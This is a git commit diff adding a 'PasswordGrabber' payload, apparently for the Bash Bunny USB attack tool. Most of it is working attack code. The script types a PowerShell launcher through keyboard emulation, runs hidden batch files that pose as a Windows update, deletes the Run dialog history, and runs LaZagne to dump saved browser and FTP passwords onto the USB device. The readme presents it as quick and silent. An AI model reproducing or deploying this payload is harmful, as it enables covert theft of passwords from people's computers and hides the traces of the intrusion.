Added PasswordGrabber payload

* Add files via upload * Update readme.md * Update e.cmd
2025-10-29 16:58:25 +00:00 · 2017-04-07 09:19:41 +02:00 · 2017-04-07 09:19:41 +02:00 · aaa246f714
commit aaa246f714
parent 6542907c6e
6 changed files with 97 additions and 0 deletions
--- a/payloads/library/PasswordGrabber/d.cmd
+++ b/payloads/library/PasswordGrabber/d.cmd
@ -0,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+cscript %~dp0\i.vbs %~dp0\e.cmd
+@exit
--- a/payloads/library/PasswordGrabber/e.cmd
+++ b/payloads/library/PasswordGrabber/e.cmd
@ -0,0 +1,35 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+
+setlocal
+cd /d %~dp0
+%~dp0\laZagne.exe all > %~dp0\..\..\loot\passwords.txt
+
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+REM Same as above but does not create empty directories
+REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
+
+)
+
+REM Blink CAPSLOCK key
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit
--- a/payloads/library/PasswordGrabber/i.vbs
+++ b/payloads/library/PasswordGrabber/i.vbs
@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
--- a/payloads/library/PasswordGrabber/laZagne.exe
+++ b/payloads/library/PasswordGrabber/laZagne.exe
--- a/payloads/library/PasswordGrabber/payload.txt
+++ b/payloads/library/PasswordGrabber/payload.txt
@ -0,0 +1,24 @@
+#!/bin/bash
+#
+# Title:         USB Exfiltration
+# Author:        Hak5Darren
+# Version:       1.0
+# Target:        Windows XP SP3+
+# Props:         Diggster, IMcPwn
+# 
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# which in turn executes e.cmd invisibly using i.vbs
+# which in turn copies documents to the loot folder on the Bash Bunny.
+#
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R
+ATTACKMODE HID STORAGE
+QUACK SET_LANGUAGE se
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+QUACK ENTER
+LED G
--- a/payloads/library/PasswordGrabber/readme.md
+++ b/payloads/library/PasswordGrabber/readme.md
@ -0,0 +1,33 @@
+# PasswordGrabber
+
+* Author: RazerBlade
+* Creds: Hak5Darren, AlessandroZ
+* Version: Version 1.0
+* Target: Windows
+
+## Description
+
+Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
+This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
+Full read here: https://github.com/AlessandroZ/LaZagne
+
+
+## Configuration
+By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
+I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
+
+If you are afraid of .exe you can compile your self from his github: https://github.com/AlessandroZ/LaZagne
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Red                | Attack Setup                                 |
+| Green              | Attack Complete                              |
+
+## Discussion
+[Hak5 Forum Thread]("https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/")
+
+## Future Work
+
+I will try to add mac support and also make the password file appear in the loot folder that [usb_exfiltrator] creates.
				`@ -0,0 +1 @@`
				`CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False`